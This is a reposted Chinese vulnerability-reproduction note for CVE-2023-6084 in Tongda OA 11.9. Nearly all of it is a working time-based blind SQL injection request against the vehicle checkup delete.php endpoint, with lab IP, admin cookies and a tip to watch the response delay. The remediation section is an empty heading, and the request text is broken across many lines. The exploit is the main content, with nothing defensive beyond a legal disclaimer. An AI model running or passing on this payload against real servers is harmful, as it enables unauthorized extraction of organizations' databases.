通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA 11.9
GET
/general/vehicle/checkup/delete.php?VU_ID=1)
%20
and
%20
(substr(DATABASE(),1,1))=char(116)
%20
and
%20
(select
%20
count(*)
%20
from
%20
information_schema.columns
%20
A,information_schema.columns
%20
B)
%20
and(1)=(1 HTTP/1.1
Host
: 192.168.245.134
User
-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept
-Language: en-US,en;q=0.5
Accept
-Encoding: gzip, deflate
Connection
: close
Referer
: http://192.168.245.134/general/
Upgrade
-Insecure-Requests: 1
Cookie
: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=6fb4da59; PHPSESSID=c6rmns16r3m39tlqmvg68bdpq7; _csrf=fb9605328bee63ab5b949c268b858d698cf75170a848c7b0882a2b8a14d66f71a
%3
A2
%3
A
%7
Bi
%3
A0
%3
Bs
%3
A5
%3
A
%22
_csrf
%22
%3
Bi
%3
A1
%3
Bs
%3
A32
%3
A
%22
dJ8hKTNoKf_MTAQdu5ag7otcWNXsBgUm
%22
%3
B
%7
D; creat_work=new
Content
-Length: 2
右下角看延时
0X03 修复建议
原文始发于微信公众号(皓月的笔记本):【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6084)
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论